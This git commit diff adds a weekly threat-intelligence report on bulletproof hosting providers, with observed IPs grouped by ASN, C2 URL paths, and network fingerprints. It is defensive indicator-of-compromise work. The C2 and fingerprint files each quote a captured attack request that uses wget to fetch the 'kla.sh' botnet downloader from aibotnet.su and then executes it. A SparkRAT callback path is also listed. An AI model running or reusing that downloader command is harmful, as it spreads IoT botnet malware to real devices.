From 805ce54d6b181cdaab453e7e50cfac14cc371b6a Mon Sep 17 00:00:00 2001 From: hrbrmstr Date: Mon, 20 Jul 2026 07:23:29 -0400 Subject: chore: weekly asn update --- kevlar/2026-07-20/iocs/README.md | 48 +++++++ kevlar/2026-07-20/iocs/all-observed-ips.txt | 188 ++++++++++++++++++++++++++++ kevlar/2026-07-20/iocs/c2-paths.txt | 41 ++++++ kevlar/2026-07-20/iocs/fingerprints.txt | 59 +++++++++ 4 files changed, 336 insertions(+) create mode 100644 kevlar/2026-07-20/iocs/README.md create mode 100644 kevlar/2026-07-20/iocs/all-observed-ips.txt create mode 100644 kevlar/2026-07-20/iocs/c2-paths.txt create mode 100644 kevlar/2026-07-20/iocs/fingerprints.txt (limited to 'kevlar/2026-07-20/iocs') diff --git a/kevlar/2026-07-20/iocs/README.md b/kevlar/2026-07-20/iocs/README.md new file mode 100644 index 0000000..bbc987b --- /dev/null +++ b/kevlar/2026-07-20/iocs/README.md @@ -0,0 +1,48 @@ +# Weekly BP Report -- 2026-07-20 + +Generated: 2026-07-20T11:15:00Z +ASNs covered: 25 (per bulletproof-asns.csv) +Query range: 2026-07-13 through 2026-07-20 (7-day window) +Sponge sessions found: ~6.9M total network traffic across 8 daily buckets +Active ASNs in Sponge: 17 (7 active+Honeylabs; 10 inactive both sources) +Honeylabs events found: ~2,600+ across 7 active ASNs +Censys IPs enriched: 14 IPs (per-host enrichment via censys_get_host) +Censys credits remaining at start: 10,000 +Anomalies flagged: 11 (3 critical, 5 high, 3 medium) + +## Top-Level Findings + +1. **AS200651 (FlokiNET)** - Tor exit 185.100.87.136 effserved as a SPARKRAT C2 callback destination (POST /api/client/update) AND Tor exit. OpenSSH upgraded from 10.1 -> 10.2p1. CRITICAL. +2. **AS216139 (Iron Hosting Centre)** - Sequential port 6001-6050 cluster with uniform 345-348 events each in Censys -- backconnect-C2 listener pattern. CRITICAL. +3. **AS57043 (Hostkey)** - IoT MIPS downloader (aibotnet.su /bins/kla.sh) from NEW IP 132.243.194.215 (Frankfurt). CRITICAL. +4. **AS209847** - Not in Census as AS209847; actually tagged belongs to ASICs41745 FORTIS-AS Baykov Ilya Sergeevich (RU, reg 2026-06-06). 998 Sponge sessions single IP 45.144.28.70. CRITICAL. +5. **AS211720 (Datashield)** - Shifted from /ews/ Exchange recon to MSSQL TDS port 1433 brute (hostname short-tan-rat, self-signed prohaska.beatty.biz cert, TLS 1.0/1.1 still enabled). +6. **AS51396 (Pfcloud)** - NEW scanner tooling 'odin-scanner/0.4' and 'Hello World' UAs. Cluster IPs rotated to 30/.49/.81/.18 from prior 78/79/80 in 204.76.203.0/24. +7. **AS14956 (RouterHosting)** - Exposed Werkzeug/3.1.8 'fofa_monitor' Basic-auth panel on port 5000 (HIGH severity Censys misconfig). +8. **AS400992 (ZhouyiSat)** - Ceased /env scanning this week; censys profile now pure Windows admin (3389/5985/135/445). Behavioral shift. + +## Headline Changes vs Prior Week + +| Metric | Prior (2026-07-13) | Current (2026-07-20) | Δ | Δ% | +|---------------------------------|-------------------:|---------------------:|------:|------:| +| Active ASNs (Sponge or HL) | 15 | 17 | +2 | +13% | +| ASNs in Censys BULLETPROOF | 11 | 12 | +1 | +9% | +| Unique HASSH/JA4H signatures | 11 | ~13 | +2 | +18% | +| Top IP Honeylabs events | 1,518 (AS51852) | 968 (AS200593) | -550 | -36% | +| Critical anomalies flagged | 2 | 3 | +1 | +50% | + +## Directory Structure + +- `sponge/` -- Arkime session stats per ASN (33 stat files + 1 timeline) +- `honeylabs/` -- top-attackers.csv, fingerprints.csv +- `censys/` -- aggregations-summary.ndjson, fleet-correlation.csv +- `changes/` -- diff-vs-prior-week.csv, anomalies.csv +- `iocs/` -- all-observed-ips.txt, fingerprints.txt, c2-paths.txt, README.md (this file) + +## Web Access + +https://git.sr.ht/~hrbrmstr/gists/tree/main/item/kevlar/2026-07-20/ + +## Operators Log + +See ../OPERATIONS_LOG.md for the full phase-by-phase operations record. \ No newline at end of file diff --git a/kevlar/2026-07-20/iocs/all-observed-ips.txt b/kevlar/2026-07-20/iocs/all-observed-ips.txt new file mode 100644 index 0000000..ceca797 --- /dev/null +++ b/kevlar/2026-07-20/iocs/all-observed-ips.txt @@ -0,0 +1,188 @@ +# Weekly BP Report -- 2026-07-20 +# All unique IPs observed across all sources, grouped by ASN +# Query range: 2026-07-13 through 2026-07-20 + +# AS57043 - Hostkey B.v. (DE/NL) +132.243.194.215 +191.101.113.207 +194.180.189.50 +82.26.91.137 + +# AS209847 (BGP-real AS41745) - Baykov Ilya Sergeevich / FORTIS (RU) +45.144.28.70 + +# AS210644 - Aeza Group LLC (AT/SE) -- Aeza sees 11 Sponge sessions, 5 IPs +62.60.231.45 +185.103.101.232 +46.226.162.236 +85.192.24.177 +89.22.229.92 + +# AS138915 - KAOPU Cloud HK (HK) +38.54.2.209 +38.54.2.232 +38.54.2.13 +38.54.2.75 +38.54.2.221 +38.54.2.148 +38.54.2.170 +38.54.2.152 +38.54.2.203 +38.54.2.204 +38.54.2.235 +38.54.2.133 +38.54.2.71 +38.54.2.131 +38.54.2.130 +38.54.2.4 +38.54.2.25 +38.54.2.54 +38.54.2.58 +154.205.139.152 + +# AS14956 - RouterHosting LLC (US) +216.126.225.6 +172.86.117.15 +172.86.116.32 +104.194.159.11 +104.194.159.137 +172.86.77.209 +216.126.239.17 +172.86.88.130 +172.86.91.170 +172.86.91.215 +107.189.27.179 +172.86.116.42 +172.86.116.99 +172.86.121.247 +172.86.91.220 +172.86.91.224 +172.86.117.54 +144.172.94.110 +104.194.154.210 +144.172.93.32 +216.126.239.17 +144.172.104.239 +172.86.123.136 +144.172.100.9 +144.172.100.114 +216.126.239.72 +107.189.16.6 +45.61.148.157 +45.61.150.163 +167.88.168.121 + +# AS216139 - Iron Hosting Centre LTD (NL) +46.30.46.124 + +# AS51852 - Private Layer INC (CH) +179.43.134.114 +179.43.175.234 +179.43.175.236 +179.43.139.58 +179.43.133.154 +81.17.28.130 +179.43.186.240 +179.43.168.58 +179.43.189.67 +179.43.170.10 +31.7.63.12 +179.43.185.147 +141.255.165.88 + +# AS400992 - ZhouyiSat Communications +23.172.217.77 +185.121.15.184 +193.46.218.82 +23.172.217.87 +45.150.195.235 + +# AS33993 - UFO-AS (TOV Aktor) +45.144.31.247 +45.150.64.125 + +# AS51396 - Pfcloud UG +204.76.203.18 +176.65.148.84 +45.153.34.89 +45.153.34.149 +45.156.87.216 +45.153.34.114 +45.153.34.165 +45.156.87.13 +45.156.87.254 +45.153.34.151 +45.153.34.167 +45.156.87.93 +45.156.87.253 +45.156.87.178 +45.153.34.235 +45.153.34.112 +45.153.34.161 +45.156.87.147 +45.153.34.181 +45.135.193.193 +176.65.148.25 +204.76.203.81 +204.76.203.49 +176.65.149.30 +176.65.149.212 +176.65.149.27 +176.65.149.31 +204.76.203.30 +176.65.148.144 +176.65.134.3 +176.65.148.2 +176.65.148.184 +45.135.194.10 +176.65.149.67 +176.65.148.250 +176.65.149.64 +176.65.148.29 +176.65.149.220 +176.65.149.230 + +# AS200651 - FlokiNET ehf (RO/IS) +185.100.87.136 +185.100.84.174 +185.100.84.164 +37.228.129.67 + +# AS30823 - aurologic GmbH (DE) +41.216.188.21 + +# AS140666 - ANY DIGITAL PTE. LTD. (HK) +154.94.68.6 +204.3.179.2 + +# AS198953 - Proton66 OOO (RU) +176.120.22.16 +176.120.22.61 +176.120.22.123 +176.120.22.122 +37.77.150.241 +37.77.150.67 +193.143.1.66 +176.120.22.192 +37.77.150.83 +37.77.150.70 +176.120.22.240 +176.120.22.147 + +# AS200593 - Prospero Ooo (TM/RU) +91.202.233.79 +91.215.85.193 +91.215.85.104 + +# AS214940 - Kprohost LLC (UA) +77.83.39.86 +77.83.39.119 +77.83.39.42 +77.83.39.94 +77.83.39.169 +77.83.39.149 +77.83.39.8 +77.83.39.14 + +# AS211720 - Datashield, Inc. (SC) +185.231.33.46 \ No newline at end of file diff --git a/kevlar/2026-07-20/iocs/c2-paths.txt b/kevlar/2026-07-20/iocs/c2-paths.txt new file mode 100644 index 0000000..f7ef2b6 --- /dev/null +++ b/kevlar/2026-07-20/iocs/c2-paths.txt @@ -0,0 +1,41 @@ +# Weekly BP Report -- 2026-07-20 +# Notable HTTP URL paths observed, ordered by detectability/signal value +# Query range: 2026-07-13 through 2026-07-20 + +# IoT MIPS downloader (NEW observation - AS57043 Hostkey) +/shell?cd+/tmp;rm+-rf+kla.sh;wget+http://aibotnet.su/bins/kla.sh;chmod+777+kla.sh;./kla.sh +# Source: 132.243.194.215 (AS57043 Hostkey B.V. DE) +# JA4H: ge11nn0400_777e992b8532 +# Method: GET on port 6001 +# Intent: Shellshock-style or webshell-triggered IoT botnet MIPS ELF downloader (mirai-variant custom) +# Indicator: 3 events on 2026-07-16 between 00:21:43 and 03:43:00 UTC +# References: aibotnet.su domain -- active C2 URL serving /bins/kla.sh MIPS binaries + +# SPARKRAT update callback (NEW observation - AS200651 FlokiNET Tor exit) +/api/client/update?arch=amd64&commit=08059e95dacafe0bf6e5782f8e2c8ec9cd8c5a17&os=windows +# Source: 185.100.87.136 (AS200651 PremiumTorExit Tor 0.4.9.11) +# JA4H: po11nn0600_c9506d37ac14 +# Method: POST with content-type "application/octet-stream" + secret header +# Intent: SPARK-RAT implant callback confirming Windows 64/amd64 implant update -- commit-style versioning commits to C2 git +# Indicator: 3 events on 2026-07-13, 5-hour window +# References: GreyNoise confirms new tag "SparkRAT Client Update Scanner" on this host + +# Event Manager RESTful probing (NEW - AS200651 FlokiNET Tor exit) +/eventmanager +# Source: 185.100.87.136 (AS200651) +# JA4H: ge11nn0400_88d30a62b7ad +# Method: GET /eventmanager HTTP/1.1 on port 443 +# Intent: SPARKRAT manager endpoint observation (subject to validation) + +# MSSQL TDS probing 1433 binary handshake (AS211720 Datashield) +MSSQL TDS Pre-Login binary 0x120100 34 bytes with "MSSQLServer" string and hostname "short-tan-rat" +# Source: 185.231.33.46 (AS211720) onto honeypot port 1433 +# associated_jarm: 07d19d12d21d21d07c42d43d000000f50d155305214cf247147c43c0f1a823 +# Intent: SQL Server payload inspection / pre-login banner to identify MSSQL version for brute +# Indicator: 2 events on 2026-07-16 and 2026-07-18 + +# Pfcloud's 8080/8081 proxy-style port range probing (AS51396) +GET / HTTP/1.1 on diverse ports 8080, 8081, 8888, 8000, 3128 -- 491 events across one week +# Source IP rotation: 45.135.193.193 (DE) primary; 45.135.194.10 (DE); 176.65.148.144 (NL); 204.76.203.30 (NL) +# UA: Go-http-client/1.1 + zgrab/0.x + odin-scanner/0.4 + Hello World +# Intent: Open proxy discovery -- scanning for proxy ports to abuse for proxy-rotation exfiltration tunnels \ No newline at end of file diff --git a/kevlar/2026-07-20/iocs/fingerprints.txt b/kevlar/2026-07-20/iocs/fingerprints.txt new file mode 100644 index 0000000..8b5b84a --- /dev/null +++ b/kevlar/2026-07-20/iocs/fingerprints.txt @@ -0,0 +1,59 @@ +# Weekly BP Report -- 2026-07-20 +# Fingerprints observed per ASN +# Query range: 2026-07-13 through 2026-07-20 + +# ============= HASSH Client Fingerprints ============= + +# AS57043 - Hostkey B.v. - IoT botnet download callback (NO SSH HASSH collected -- HTTP only) +AS57043,132.243.194.215,ja4h,ge11nn0400_777e992b8532,,IoT MIPS downloader GET /shell?cd+/tmp;rm+-rf+kla.sh;wget+http://aibotnet.su/bins/kla.sh on port 6001 + +# AS51396 - Pfcloud - dominant scan cluster (no live SSH probed - 204.76.203.18 census HASSH) +AS51396,204.76.203.18,hassh-server,425d29fe50d8e4f5e37efb6e24bcf660,SSH-2.0-OpenSSH_9.2p1 Debian-2+deb12u7,Coordinated scan cluster leader; 13,766 Sponge sessions +AS51396,204.76.203.18,ja4tscan-65160_MTU,42340_2-1-1-4-1-3_1460_10_1-2,,Distinctive MTU 42340 (NOT default Ubuntu 65160) -- custom tuning (smaller MSS) + +# AS51852 - Private Layer INC - OpenSSH 8.9p1 Ubuntu-3ubuntu0.15 (same HASSH as AS209847/FORTIS) +AS51852,81.17.28.130,hassh-server,41ff3ecd1458b0bf86e1b4891636213e,SSH-2.0-OpenSSH_8.9p1 Ubuntu-3ubuntu0.15,PLI-AS new primary IP for week; OpenSSH_8.9p1 with Ubuntu-3 patch level .15 (vs .16 in FORTIS/KPRONET) + +# AS200651 - FlokiNet Tor exit - OpenSSH 10.2p1 (UPGRADED from last week's OpenSSH 10.1) +AS200651,185.100.87.136,hassh-client,e54ef3ec27fe1fea7ab64d3fa05359fd,SSH-2.0-OpenSSH_10.2p1,SSH-10.x series shares HASSH; banner string subtly updated +AS200651,185.100.87.136,hassh-server,b1bff636ebbdbaa9dd2ad97fd173c956,SSH-2.0-OpenSSH_9.9,Alt-SSH server on port 7288 (not 22) +AS200651,185.100.87.136,jarm,2ad2ad16d2ad2ad00042d42d000000332dc9cd7d90589195193c8bb05d84fa,,Tor 0.4.9.11 default 9001 listener jarm + +# AS400992 - ZhouyiSat - now testing against Windows admin ports (no SSH/TLS fingerprints collected) + +# AS14956 - RouterHosting LLC - OpenSSH 9.6p1 Ubuntu-3ubuntu13.18 (NOT vulnerable to regreSSHion) + Werkzeug fofa_monitor panel +AS14956,216.126.239.17,hassh-server,e42184b06d45385a906f0803d04c83da,SSH-2.0-OpenSSH_9.6p1 Ubuntu-3ubuntu13.18,Patched against regreSSHion +AS14956,216.126.239.17,fofa-monitor-realm,Basic realm=\"fofa_monitor\",Werkzeug/3.1.8 Python/3.12.3,Censys flagged CENSYS-2022-1002 Unencrypted HTTP Weak Auth on port 5000 -- a fofa-search-style monitoring panel + +# AS214940 - Kprohost LLC - OpenSSH 8.9p1 Ubuntu-3ubuntu0.16 (same HASSH as AS209847/FORTIS, AS51852/PLI) +AS214940,77.83.39.119,hassh-server,41ff3ecd1458b0bf86e1b4891636213e,SSH-2.0-OpenSSH_8.9p1 Ubuntu-3ubuntu0.16,Uniform Ubuntu 22 LTS provisioning across BP providers + +# AS211720 - Datashield - self-signed cert with hostname prohaska.beatty.biz +AS211720,185.231.33.46,jarm,07d19d12d21d21d07c42d43d000000f50d155305214cf247147c43c0f1a823,,Distinctive TLS 1.0/1.1 still enabled +AS211720,185.231.33.46,cert-self-signed,"CN=prohaska.beatty.biz; C=US; ST=HI; O=Prohaska-Beatty; OU=compress; emailAddress=compress@prohaska.beatty.biz",Validity 2022-08-16 -> 2029-08-14 (7 years),Static long-lived fake US business entity cert + +# AS198953 - Proton66 OOO - GreyNoise suspicious multi-protocol brute +AS198953,176.120.22.16,greynoise,suspicious,"tags: MySQL Protocol, TLS Crawler, Python requests client, Generic Suspicious Linux Command",Proton66 top IP this week (replaced 176.120.22.240) + +# AS209847 ("Sponge tag") / Real AS = AS41745 (FORTIS-AS Baykov Ilya Sergeevich RU) +AS209847-real-41745,45.144.28.70,hassh-server,41ff3ecd1458b0bf86e1b4891636213e,SSH-2.0-OpenSSH_8.9p1 Ubuntu-3ubuntu0.16,Same Ubuntu 22 LTS HASSH across multiple bulletproof providers. Known CVEs include CVE-2024-6387 regreSSHion (KEV), CVE-2025-26465, CVE-2023-38408 (KEV), CVE-2026-35385 (HIGH) + +# ============= JA4 / JA3 TLS Fingerprints ============= + +# AS200651 - Stable across prior week (Tor 1.3_d1_d2 client) +AS200651,185.100.87.136,ja4,t13i1909h2_9dc949149365_97f8aa674fd9,TLSv1.3,Stable TLS 1.3 Chrome-with-Tor-pattern fingerprint +AS200651,185.100.87.136,ja3,7c1e207beb00684bbbe144f1b0abe1d5,TLSv1.3,Stable +AS200651,185.100.87.136,ja4h-get,ge11nn0400_88d30a62b7ad,GET /eventmanager HTTP/1.1,GET /eventmanager on port 443 (eventmanager path new this week) +AS200651,185.100.87.136,ja4h-post-spark,po11nn0600_c9506d37ac14,POST /api/client/update?arch=amd64&commit=08059e95...&os=windows,SPARKRAT callback with octet-stream binary body + secret header + +# AS30823 - new entrant with same JA4-base as AS200651 Tor (but different full JA4 due to cipher list composition) +AS30823,41.216.188.21,ja4,t13i190800_9dc949149365_97f8aa674fd9,TLSv1.3,Same JA4-y-binning base "9dc949149365_97f8aa674fd9" as Tor exit (different i-form 190800 vs 190900 means narrower cipher suite) +AS30823,41.216.188.21,ja3,19e29534fd49dd27d09234e639c4057e,TLSv1.3,Distinct JA3 RSA-only fingerprint from a benign mobile Android 9 source (Redmi G8141) +AS30823,41.216.188.21,ja4h,ge11nn0500_9af7e0472034,GET / HTTP/1.1,Android 9 G8141 Chrome 76 mobile UA -- likely benign single connection + +# AS51396 - Pfcloud's new scanner fingerprints: +AS51396,various,ua,Go-http-client/1.1,3 IPs,Go-lang default HTTP client scanner +AS51396,various,ua,Mozilla/5.0 zgrab/0.x,3 IPs,ZGrab academic scanner +AS51396,various,ua,odin-scanner/0.4,1 IP (38 events),NEW THIS WEEK -- brand-new custom tooling on Pfcloud farm +AS51396,various,ua,Hello World,1 IP (12 events),Distinctive minimalistic UA +AS51396,various,ua,Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/149.0.0.0 Safari/537.36,1 IP (51 events),Chrome 149 spoofing from within Pfcloud infra \ No newline at end of file -- cgit v1.2.3